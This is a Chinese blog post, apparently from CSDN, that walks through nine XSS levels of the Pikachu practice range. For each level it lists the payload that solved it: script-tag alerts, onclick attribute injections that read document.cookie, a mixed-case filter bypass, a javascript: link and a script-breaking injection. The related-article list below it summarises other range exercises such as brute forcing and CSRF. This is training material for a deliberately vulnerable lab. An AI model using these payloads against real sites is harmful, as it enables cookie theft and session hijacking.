pikachu中XSS闯关

最新推荐文章于 2024-04-17 14:47:44 发布
最新推荐文章于 2024-04-17 14:47:44 发布
阅读量119 收藏
点赞数 1
分类专栏: pikachu中XSS闯关 网络安全 文章标签: xss 前端 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDNagk1/article/details/132630339
版权

文章目录

前言

本文基于的是pikachu中的XSS闯关,在这篇文章里介绍了一共九种XSS的闯关细节和代码,希望对读者理解XSS漏洞有一定的了解。

闯关流程

一、反射型XSS(get)

代码:<script>alert('xss')</script>

二、存储型XSS

代码:<script>alert('xss')</script>

三、DOM型XSS

代码:' οnclick="alert('xss')">

代码:' οnclick="alert(document.cookie)">

四、DOM型XSS-x

代码:#' οnclick="alert(document.cookie)">

五、XSS之盲打

首先在第一个对话框里输入的代码如下

<script>alert('xss')</script>

在URL中输入192.168.182.30/pikachu/pikachu-master/vul/xss/xssblind/admin_login.php

用户名为admin,密码为123456

结果图如下

六、XSS之过滤

代码:<SCript>alert('xss')</ScriPt>

结果图为

七、XSS之htmlspecialchars

代码:q' οnclick='alert("xss")'

结果图为

八、XSS之href输出

代码:javascript:alert('xss')

九、XSS之js输出

代码:</script><script>alert('xss')</script>

总结

笔者写这些实属不易,希望能得到读者认可的同时,最重要还是希望读者能有所收获......

转瞬都有
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防系列——pikachu靶场通练习
weixin_43140411的博客
10-23 1940
从来没有哪个时代的黑客像今天一样热衷于猜解密码 ---奥斯特洛夫斯基
SQL注入-Pikachu靶场通_pikachu靶场通sql(1),网络安全应用开发基础大纲
m0_61369275的博客
04-06 777
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
pikachu靶场- CSRF,文件包含、文件上传
akucoco的博客
02-11 592
pikachu靶场- CSRF,文件包含、文件上传
Pikachu靶场暴力破解通流程
最新发布
weixin_58279787的博客
04-17 346
将抓请求包放到重定向,快捷键Ctrl+r,修改密码或用户,不断重定向,发现响应是都是报“用户或密码不存在”,并没有报验证码错误,就可以判断验证码可以重复利用。在Intruder--->Positions,如果爆破密码就用sniper模式,如果用户和密码都要爆破就Cluster bomb模式;这我使用的闭JavaScript这个来爆破,这的验证码是只在前段进行验证,直接把JavaScrip闭了就直接跳过验证码了。1是用户的字典,2是密码的字典。接下去选择响应包键,好区分爆破是否成功。
Pikachu-----目录遍历/信息泄露/PHP反序列化/XXE/URL/SSRF
m0_65712192的博客
01-03 927
Pikachu-----目录遍历/信息泄露/PHP反序列化/XXE/URL/SSRF
pikachu-xss.txt
06-10
pikachu-xss
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
pikachu靶场包含网络安全常见的漏洞
11-08
pikachu靶场通包含网络安全常见的漏洞、XSS、SQL注入、目录遍历、文件上传、文件包含、远程执行等常见的漏洞都集成在此靶场的源码上!!
pikachu靶场全部通.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu-master
05-04
pikachu漏洞测试平台搭建
Pikachu靶场通秘籍(持续更新)
liu914589417的博客
10-17 4268
Pikachu靶场通秘籍(持续更新)
Pikachu靶场全详细教学(一)
qq_59611876的博客
12-14 3727
Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意.
pikachu1-暴力破解
m0_62677808的博客
12-02 757
但是我们输入刷新后的验证码,就不会提示验证码有问题,但是只要我们点击pikachu的验证码图片,验证码一更新,我们就必须再换验证码重发,所以只要我们不更新验证码,就可以用这一个验证码对账号密码进行爆破。token值是在我们提交完用户名和密码之后会生成的一个值,它在我们下一次提交时会用做校验,但是在我们提交完登录按钮之后,它的下一个token值是可以被我们找到的,所以这个防爆破对我们来说是没有意义的。我们随便输入用户名和密码之后,输入错误的验证码,此时会提示验证码输入错误。
pikachu教程(Over Permission)
Bu2n的博客
12-13 921
越权漏洞水平越权垂直越权 水平越权 这里有三个用户 登录lucy的 查看源码 if(isset($_GET['submit']) && $_GET['username']!=null){ //没有使用session来校验,而是使用的传进来的值,权限校验出现问题,这里应该跟登录态系进行绑定 $username=escape($link, $_GET['username']); $query="select * from member where username
Pikachu笔记
BROTHERYY的博客
06-24 9608
Pikachu 靶机练习 一、暴力破解 1.基于表单的暴力破解 抓包,加载字典。 2.验证码绕过(on server) 3.验证码绕过(on client) 4.验证码绕过(token 防爆破) 通过测试发现每个数据包的token在变化,尝试使用pitchfork进行爆破 具体设置如下: 选择pitchfork进行爆破,添加密码和token变量 因为token的变化需要修改线程数 在Grep - Extract 选项添加参数 在页面最低部找到always选项 回到payloads模块 正常
pikachu 暴力破解 Brute Force(皮卡丘漏洞平台通系列)
箭雨镜屋
02-14 6911
一、官方概述 pikachu官方对暴力破解的介绍如下,我要嘲笑一下他brute拼错了(~ ̄▽ ̄)~ 二、仙女的通 暴力破解,首先得有字典。
pikachu CSRF(跨站请求伪造) (皮卡丘漏洞平台通系列)
箭雨镜屋
04-14 7508
一、官方介绍 本节引用内容来自pikachu漏洞平台(删了一些内容,留下了最重要的部分,并为精炼语言进行了一些修改) 1、我们判断一个网站是否存在CSRF漏洞,其实就是判断其对键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。 2、本质是借用户的权限完成攻击,因此攻击成功需要用户已经通过验证获得了权限,并触发了攻击者提供的请求。 3、网站如果要防止CSRF攻击,则需要对敏感信息的操作实施对应的安全措施,防止这些操作出现被伪造的情况,从而导致CSRF。比如: --对敏感信息的操作增加安全
pikachu教程
小宇的web博客
04-29 8229
pikachu教程(暴力破解和xss) 1.暴力破解 基于表单的暴力破解 1.最简单的暴力破解没有验证码不需要绕过,直接进行抓包。 直接找到一组账号和密码 验证码绕过(on server) 先进行抓包查看抓包的数据 这里发现验证码是不会发生改变的所以不用在意验证码,直接进行爆破即可 验证码绕过(on client) 这个验证码是通过前端的JavaScript来进行了验证码的验证,这里一些不懂技术的人可以被防治,但是懂技术人都懂在前端的验证码都是无效的 这里通过bp来进行前端代码修改来进行验证码的
pikachu靶场xss
05-24
Pikachu 靶场是一款用于学习和测试 Web 安全漏洞的免费开源平台,其包括了 XSS 攻击的相漏洞。 首先,你需要在本地安装好 Pikcahu 靶场,然后进入靶场的 XSS 模块。在该模块,你可以看到已经准备好的一些 XSS 漏洞,你需要尝试在这些漏洞注入恶意代码,以达到攻击的目的。 在注入恶意代码时,你可以使用常见的 XSS 攻击手段,例如在输入框输入 `<script>alert("XSS");</script>`,然后提交表单。如果靶场的漏洞存在,你将会看到弹出窗口显示 "XSS",说明你已经成功地注入了恶意代码。 当然,这只是一个简单的例子,实际上,XSS 攻击还有很多种形式和方法,你可以尝试不同的注入方式,以更好地理解和掌握这个漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

转瞬都有

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值